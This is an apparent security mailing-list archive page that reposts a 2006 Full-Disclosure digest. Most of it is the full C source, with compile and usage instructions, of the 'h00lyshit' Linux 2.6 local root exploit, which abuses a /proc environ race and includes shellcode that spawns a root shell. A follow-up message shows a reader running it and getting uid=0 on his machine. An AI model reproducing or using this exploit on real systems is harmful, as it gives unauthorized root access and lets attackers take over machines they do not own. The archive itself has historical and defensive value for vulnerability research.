Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] Linux Kernel "/proc" Race Condition exploit
> Subject: Full-Disclosure Digest, Vol 17, Issue 28
> ------------------------------
>
> Message: 15
> Date: Fri, 14 Jul 2006 22:43:43 +0100 (BST)
> From: "Joanna R." <h00lyshit@xxxxxxxx>
> Subject: [Full-disclosure] Linux kernel 0day - dynamite
> inside, don't
> burn your fingers
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20060714214343.88743.qmail@xxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=iso-8859-1
>
> here again the c0de in body - I dunno whether it made it through the
> scrubbing. Normally I use telnet to SMTP port to write mails so I'm
> pretty lost using yahoo. apologise for incovenience.
>
> ---------------------- cut ----------------------
>
> /*
> ** Author: h00lyshit
> ** Vulnerable: Linux 2.6 ALL
> ** Type of Vulnerability: Local Race
> ** Tested On : various distros
> ** Vendor Status: unknown
> **
> ** Disclaimer:
> ** In no event shall the author be liable for any damages
> ** whatsoever arising out of or in connection with the use
> ** or spread of this information.
> ** Any use of this information is at the user's own risk.
> **
> ** Compile:
> ** gcc h00lyshit.c -o h00lyshit
> **
> ** Usage:
> ** h00lyshit <very big file on the disk>
> **
> ** Example:
> ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
> **
> ** if y0u dont have one, make big file (~100MB) in /tmp with dd
> ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
> **
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/prctl.h>
> #include <sys/mman.h>
> #include <sys/wait.h>
> #include <linux/a.out.h>
> #include <asm/unistd.h>
>
>
> static struct exec ex;
> static char *e[256];
> static char *a[4];
> static char b[512];
> static char t[256];
> static volatile int *c;
>
>
> /* h00lyshit shell code */
> __asm__ (" __excode: call 1f \n"
> " 1: mov $23, %eax \n"
> " xor %ebx, %ebx \n"
> " int $0x80 \n"
> " pop %eax \n"
> " mov $cmd-1b, %ebx \n"
> " add %eax, %ebx \n"
> " mov $arg-1b, %ecx \n"
> " add %eax, %ecx \n"
> " mov %ebx, (%ecx) \n"
> " mov %ecx, %edx \n"
> " add $4, %edx \n"
> " mov $11, %eax \n"
> " int $0x80 \n"
> " mov $1, %eax \n"
> " int $0x80 \n"
> " arg: .quad 0x00, 0x00 \n"
> " cmd: .string \"/bin/sh\" \n"
> " __excode_e: nop \n"
> " .global __excode \n"
> " .global __excode_e \n"
> );
>
>
>
> extern void (*__excode) (void);
> extern void (*__excode_e) (void);
>
>
> void
> error (char *err)
> {
> perror (err);
> fflush (stderr);
> exit (1);
> }
>
>
> /* exploit this shit */
> void
> exploit (char *file)
> {
> int i, fd;
> void *p;
> struct stat st;
>
> printf ("\ntrying to exploit %s\n\n", file);
> fflush (stdout);
> chmod ("/proc/self/environ", 04755);
> c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
> MAP_ANONYMOUS, 0, 0);
> memset ((void *) c, 0, 4096);
>
> /* slow down machine */
> fd = open (file, O_RDONLY);
> fstat (fd, &st);
> p =
> (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE,
> fd, 0);
> if (p == MAP_FAILED)
> error ("mmap");
> prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
> sprintf (t, "/proc/%d/environ", getpid ());
> sched_yield ();
> execve (NULL, a, e);
> madvise (0, 0, MADV_WILLNEED);
> i = fork ();
>
> /* give it a try */
> if (i)
> {
> (*c)++;
> !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
> prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
> sched_yield ();
> }
> else
> {
> nice(10);
> while (!(*c));
> sched_yield ();
> execve (t, a, e);
> error ("failed");
> }
>
> waitpid (i, NULL, 0);
> exit (0);
> }
>
>
> int
> main (int ac, char **av)
> {
> int i, j, k, s;
> char *p;
>
> memset (e, 0, sizeof (e));
> memset (a, 0, sizeof (a));
> a[0] = strdup (av[0]);
> a[1] = strdup (av[0]);
> a[2] = strdup (av[1]);
>
> if (ac < 2)
> error ("usage: binary <big file name>");
> if (ac > 2)
> exploit (av[2]);
> printf ("\npreparing");
> fflush (stdout);
>
> /* make setuid a.out */
> memset (&ex, 0, sizeof (ex));
> N_SET_MAGIC (ex, NMAGIC);
> N_SET_MACHTYPE (ex, M_386);
> s = ((unsigned) &__excode_e) - (unsigned) &__excode;
> ex.a_text = s;
> ex.a_syms = -(s + sizeof (ex));
>
> memset (b, 0, sizeof (b));
> memcpy (b, &ex, sizeof (ex));
> memcpy (b + sizeof (ex), &__excode, s);
>
> /* make environment */
> p = b;
> s += sizeof (ex);
> j = 0;
> for (i = k = 0; i < s; i++)
> {
> if (!p[i])
> {
> e[j++] = &p[k];
> k = i + 1;
> }
> }
>
> /* reexec */
> getcwd (t, sizeof (t));
> strcat (t, "/");
> strcat (t, av[0]);
> execve (t, a, e);
> error ("execve");
> return 0;
> }
>
>
>
>
> ___________________________________________________________
> The all-new Yahoo! Mail goes wherever you go - free your
> email address from your Internet provider.
>
>
>
>
> ------------------------------
>
> Message: 16
> Date: Fri, 14 Jul 2006 23:55:31 +0200
> From: Dan B <dan-fd@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Linux kernel 0day - dynamite inside,
> don't burn your fingers
> To: "Joanna R." <h00lyshit@xxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <44B812D3.5000806@xxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hello,
>
> Joanna R. wrote:
> > Hello,
> >
> > attached 0day kernel 2.6 local root exploit. This is a new genuine
> > bug, unpatched in 2.6.17.4 - don't get confused by prctl
> inside - it
> > is only used to change process status.
> Tested on
>
> dan@n-box ~ $ uname -a
> Linux n-box 2.6.16-gentoo-r9 #1 Fri Jun 9 16:44:22 CEST 2006 i686
> Intel(R) Pentium(R) M processor 2.00GHz GNU/Linux
>
> dan@n-box ~ $ ./h00lyshit ./Media/Audio/DnB/TheEngineer_060331.mp3
>
> preparing
> trying to exploit ./Media/Audio/DnB/TheEngineer_060331.mp3
>
> sh-3.1# id
> uid=0(root) gid=100(users)
> groups=7(lp),10(wheel),18(audio),27(video),35(games),81(apache
> ),100(users),7353(svnusers)
> sh-3.1# whoami
> root
> sh-3.1#
>
>
> > The code exploits a root race in /proc
>
> So it does :)
> >
> > have a nice day.
>
> But this means that I've gotta worry about more servers now! Dam it!
>
> And is there a workaround to protect against this attack?
>
>
> Cheers,
> Dan.
>
>
>
|
